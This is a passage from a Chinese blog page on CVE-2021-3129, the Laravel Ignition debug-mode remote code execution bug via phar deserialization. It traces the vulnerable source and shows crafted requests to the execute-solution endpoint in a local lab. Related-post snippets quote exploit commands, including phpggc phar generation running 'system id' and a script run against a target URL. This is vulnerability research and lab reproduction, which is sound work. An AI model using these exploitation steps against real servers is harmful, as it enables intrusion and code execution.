CVE-2021-3129分析

最新推荐文章于 2024-11-07 17:51:02 发布
原创 最新推荐文章于 2024-11-07 17:51:02 发布 · 374 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络

该博客详细分析了CVE-2021-3129漏洞,涉及PHP的phar和deserialization。内容包括环境搭建、源码分析、POC和EXP编写,以及利用思路和修复方案。通过操纵日志文件,利用phar文件结构特点实现反序列化攻击。

CVE-2021-3129分析

  • Tag: [[php phar]] | [[php deserialize]]

Env搭建

VulEnv/laravel/cve_2021_3129 at master · XuCcc/VulEnv

Source 分析

根据描述,本质上是由于 facade/ignition 引入的问题,直接查看 ignition 的 commit 记录[^1] 看到 \Facade\Ignition\Solutions\MakeViewVariableOptionalSolution 添加了一个安全过滤函数 isSafePath

// \Facade\Ignition\Solutions\MakeViewVariableOptionalSolution::makeOptional
public function makeOptional(array $parameters = []){
      
      
    $originalContents = file_get_contents($parameters['viewFile']);
    $newContents = str_replace('$'.$parameters['variableName'], '$'.$parameters['variableName']." ?? ''", $originalContents);
 
 
    $originalTokens = token_get_all(Blade::compileString($originalContents));
 
 
    $newTokens = token_get_all(Blade::compileString($newContents));
 
 
 
 
    $expectedTokens = $this->generateExpectedTokens($originalTokens, $parameters['variableName']);
 
 
 
 
    if ($expectedTokens !== $newTokens) {
      
      
 
 
        return false;
 
 
    }
 
 
 
 
    return $newContents;}
 

 

发现危险函数 file_get_contents ,跟踪函数调用栈
 

     
 
  1. \Facade\Ignition\Solutions\MakeViewVariableOptionalSolution::makeOptional
    2.  
 
  2. \Facade\Ignition\Solutions\MakeViewVariableOptionalSolution::run
    3.  
 
  3. \Facade\Ignition\Http\Controllers\ExecuteSolutionController::__invoke
    4.  
 
  4. \Facade\Ignition\IgnitionServiceProvider::registerHousekeepingRoutes
    参数 $parameters['viewFile'] 无过滤,通过 execute-solution 路由可以进行触发,结合官方文档[^2] 可知,在执行 solution 操作时将走到 source 处。
    5.  

 

 
 
Poc 编写
 

 

启动环境后,就出现了一个 igition 的错误修复界面,点击 Generate app key 抓包
 

 

 
 

POST /_ignition/execute-solution HTTP/1.1
 

 
 
Host: localhost:8000
 
 
Content-Length: 82
 
 
Accept: application/json
 
 
Content-Type: application/json
 
 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
 
 
Origin: http://localhost:8000
 
 
Referer: http://localhost:8000/
 
 
Accept-Encoding: gzip, deflate
 
 
Accept-Language: zh-CN,zh;q=0.9
 
 
Connection: close
 
 
{
      
      "solution":"Facade\\Ignition\\Solutions\\GenerateAppKeySolution","parameters":[]}
 

 

然后修改参数 solution 修改为 MakeViewVariableOptionalSolution 指定 solution
 

 
 
POST /_ignition/execute-solution HTTP/1.1
 
 
Host: localhost:8000
 
 
Content-Length: 163
 
 
Accept: application/json
 
 
Content-Type: application/json
 
 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
 
 
Origin: http://localhost:8000
 
 
Referer: http://localhost:8000/
 
 
Accept-Encoding: gzip, deflate
 
 
Accept



                

        

    


  


        

            

                      
                        最低0.47元/天 解锁文章
                          
                      
            

        


    

      

        

            

              
                
                  IT科技苏辞
                
              
            

            

                关注
              
            

        

        

          
      

      










                



	

		

			

				
					
redis最近被爆出有漏洞,可以升级到6.x

				
			

			

				

					weixin_42551921的博客
				

				

					03-29
					
					2589
					
				

			

		

		

			
				
redis最近被爆出有漏洞,官方暂时未提供补丁包,所以还是升级比较靠谱;
升级步骤:
1、执行命令 ps -aux|grep redis 找到redis服务,使用kill 停掉服务
2、下载redis安装包:wget http://download.redis.io/releases/redis-6.2.1.tar.gz
3、解压: tar -zxvf redis-6.2.1.tar.gz redis-6.2.1
4、编译: cd 进入redis-6.2.1,执行命令make
5、完成后提示 make t.

			
		

	



                

            
              



	

		

			

				
					
Laravel Debug mode RCE(CVE-2021-3129)漏洞复现

				
			

			

				

					feng的博客
				

				

					05-31
					
					1996
					
				

			

		

		

			
				
Laravel Debug mode RCE(CVE-2021-3129)漏洞复现
前言
这个之前在VNCTF2021的时候遇到过,当时自己只是拿着脚本直接打,并没有对于原理好好了解一下。最近国赛,还有i春秋都出现了以yii和thinkphp为背景的关于日志写phar来实现phar反序列化的这种题目,所以就来好好地复现和学习一下这个RCE。中间也是踩了很多坑,在@Jiang师傅的帮助下复现成功,也是加深了理解。
参考链接
一定一定一定把这篇文章中讲到的都仔细地领悟一下,踩的很多坑都是因为看这篇文章的时候比较

			
		

	



              


  
              

                


	

		

			

				
					
【vulfocus漏洞复现】Laravel Debug mode RCE(CVE-2021-3129)复现

				
			

			

				

					一剑开天门!的博客
				

				

					02-26
					
					3415
					
				

			

		

		

			
				
【vulfocus漏洞复现】Laravel Debug mode RCE(CVE-2021-3129)复现(由于本人现在还比较菜,勿喷!)

			
		

	





	

		

			

				
					
CVE-2021-3129:Laravel远程代码漏洞复现分析

				
			

			

				

					华为云官方博客
				

				

					03-17
					
					7500
					
				

			

		

		

			
				
本文主要为大家带来CVE-2021-3129漏洞复现分析,为大家在日常工作中提供帮助。

			
		

	



		

			
		



	

		

			

				
					
CVE-2021-3129-Laravel Debug mode 远程代码执行漏洞

				
			

			

				

					thelostworld
				

				

					01-29
					
					4444
					
				

			

		

		

			
				
CVE-2021-3129-Laravel Debug mode 远程代码执行漏洞

​

一、漏洞简介

Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。

Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。

二、影响版本

Larav..

			
		

	





	

		

			

				
					
Laravel Debug mode远程代码执行漏洞(CVE-2021-3129)复现分析

				
			

			

				

					小小猪的博客
				

				

					11-13
					
					2447
					
				

			

		

		

			
				
Laravel Debug mode远程代码执行漏洞(CVE-2021-3129)复现分析

漏洞描述:

Laravel 是一个免费的开源 PHP Web 框架,在国内外应用十分广泛。2021年1月份,国外某安全研究团队披露了 Laravel <= 8.4.2 版本中存在远程代码执行漏洞。

当Laravel开启了Debug模式时,由于Laravel自带的Ignition组件的某些函数功能存在过滤不严的问题,导致攻击者可以发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,造成远程代码执行,

			
		

	





	

		

			

				
					
Laravel Debug mode 远程代码执行漏洞(CVE-2021-3129 )

				
			

			

				

					qq_73767109的博客
				

				

					07-03
					
					1960
					
				

			

		

		

			
				
Laravel < 8.4.3可以实现日志利用造成phar反序列化。

			
		

	





	

		

			

				
					
分析Laravel框架CVE-2021-3129远程代码执行漏洞

				
			

			

				

					
				

			

		

		

			
				
- **CVE-2021-3129漏洞**:CVE(Common Vulnerabilities and Exposures)是一个标准化的漏洞命名和记录系统。CVE-2021-3129是指2021年被发现的一个特定的安全漏洞。在Laravel框架的上下文中,它是一个具体的漏洞,...

			
		

	





	

		

			

				
					
复现CVE-2021-3129

					
最新发布

				
			

			

				

					m0_67795959的博客
				

				

					11-07
					
					1089
					
				

			

		

		

			
				
CVE-2021-3129 是 Laravel 框架中的一个远程代码执行漏洞,当 Laravel 开启 Debug 模式时,由于 Laravel 自带的 Ignition 组件对。函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意 Log 文件等方式触发 Phar 反序列化,最终造成远程代码执行。www-data是服务用户,服务用户--------》普通用户--------》root超级管理员权限。下载CVE-2021-3129漏洞exp。利用exp远程下载木马并执行。查找可以提权的内核漏洞。

			
		

	





	

		

			

				
					
Laravel Debug mode 远程代码执行(CVE-2021-3129

				
			

			

				

					jammny
				

				

					01-30
					
					4103
					
				

			

		

		

			
				
漏洞详情

Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。

漏洞影响

Laravel <= 8.4.2

Ignition <= 2.5.1

漏洞利用

下载靶场:gi

			
		

	





	

		

			

				
					
CVE-2021-3129:Laravel调试RCE

				
			

			

				

					05-26
				

			

		

		

			
				
CVE-2021-3129
Laravel debug rce
食用方法
执行docker-compse up -d启动环境
访问8888端口后点击首页面的generate key就可以复现了
关于docker环境想说的几点:
把.env.example复制到.env作用是开启debug环境
关闭了php.ini的phar.readonly
在resources/view/里添加了一个hello模板并引用了一个未定义变量,同时在routes/web.php添加路由(这个我加在源码里了,没写dockerfile里)
复现效果
脚本已放出,脚本要和phpggc项目文件夹在同一级目录下。
通用性不强(至少打我自己的环境可以),大家可自行把phpggc的其它rce链也加进去,提高通杀能力。
参考资源

			
		

	





	

		

			

				
					
laravel-CVE-2021-3129-EXP-main.zip   写shellexp

				
			

			

				

					12-17
				

			

		

		

			
				
CVE-2021-3129-EXP 自动写shell的exp

			
		

	





	

		

			

				
					
CVE-2021-3129:Laravel <= v8.4.2调试模式

				
			

			

				

					05-10
				

			

		

		

			
				
CVE-2021-3129
 Laravel <= v8.4.2调试模式:远程执行代码(CVE-2021-3129)
修改了@crisprss师傅的增加了更多可用的小工具用作遍历
用:
 python3 exp.py http://127.0.0.1:8888
效果: 
 zhzy@debian:/opt/tools/vuln/laravel/CVE-2021-3129/phpggc$ python3 exp.py http://127.0.0.1:8888
[*] Try to use Laravel/RCE1 for exploitation.
[+]exploit:
[*] Laravel/RCE1 Result:
[*] Try to use Laravel/RCE2 for exploitation.
[+]exploit:
[*] Laravel/RCE2 Result:
[*

			
		

	





	

		

			

				
					
laravel-exploits:针对CVE-2021-3129的漏洞利用

				
			

			

				

					05-25
				

			

		

		

			
				
laravel漏洞
漏洞利用CVE-2021-3129详细信息:  ://www.ambionics.io/blog/laravel-debug-rce
用法
$ php -d ' phar.readonly=0 ' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id 
$ ./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar
Log file: /work/pentest/laravel/laravel/storage/logs/laravel.log
Logs cleared
Successfully converted to PHAR !
Phar deserialized
-----------

			
		

	





	

		

			

				
					
CVE-2021-3129

				
			

			

				

					weixin_48300170的博客
				

				

					07-19
					
					4093
					
				

			

		

		

			
				
CVE-2021-3129 Laravel Debug mode RCE漏洞复现漏洞简介漏洞信息环境搭建漏洞复现修复建议
漏洞简介
      当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。
影响版本
 &n

			
		

	





	

		

			

				
					
Laravel RCE(CVE-2021-3129)复现

				
			

			

				

					m0_64815693的博客
				

				

					01-27
					
					2999
					
				

			

		

		

			
				
CVE-2021-3129漏洞复现  Laravel Debug mode RCE

			
		

	





	

		

			

				
					
【阿一网络安全】laravel 远程代码执⾏ (CVE-2021-3129

				
			

			

				

					Ayixy的博客
				

				

					07-08
					
					667
					
				

			

		

		

			
				
它可以让你从面条一样杂乱的代码。它可以帮你构建一个完美的网络。,攻击者可以通过发起恶意请求。,攻击者可以通过发起恶意请求。,而且每行代码都可以简洁。,最终造成远程代码执行。,最终造成远程代码执行。,此处为写⼊⼀句话⽊⻢到。Ignition  组。()函数的不安全使用。Laravel  自。()函数的不安全使用。,没有对应⽂件或⽬录。

			
		

	





	

		

			

				
					
CVE-2021-3129 Laravel Debug mode 远程代码执行漏洞

				
			

			

				

					m0_58596609的博客
				

				

					11-30
					
					2140
					
				

			

		

		

			
				
CVE-2021-3129 Laravel Debug mode 远程代码执行漏洞

			
		

	





	

		

			

				
					
CVE-2021-3129远程执行代码漏洞复现

				
			

			

				

					weixin_48085856的博客
				

				

					02-06
					
					1819
					
				

			

		

		

			
				
CVE-2021-3129远程执行代码漏洞
Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。

			
		

	





	

		

			

				
					
Laravel CVE-2021-3129漏洞利用工具包解析

				
			

			

				

					
				

			

		

		

			
				
资源摘要信息:"Laravel-CVE-2021-3129-EXP-main.zip是一个关于CVE-2021-3129漏洞的Exploit工具包,该漏洞是Laravel框架中的一个安全漏洞,攻击者可以通过这个漏洞在受影响的服务器上自动写入Shell。CVE-2021-3129是...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

  

	
    

      

      

      

        
        

          
          

            

              成就一亿技术人!
            

            

              拼手气红包6.0元
            

          

        

        

          

            还能输入1000个字符
          

          

             
          

          

            

              红包
              添加红包
            

            

              表情包
              插入表情
              

                

              

            

            

              表情包
              代码片
              

                
              

            

            

              
              
              
              
              
              
              
            

          

        

      

    

		

			

			

			

					 条评论被折叠 查看
			

			

				
			

		

	

	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值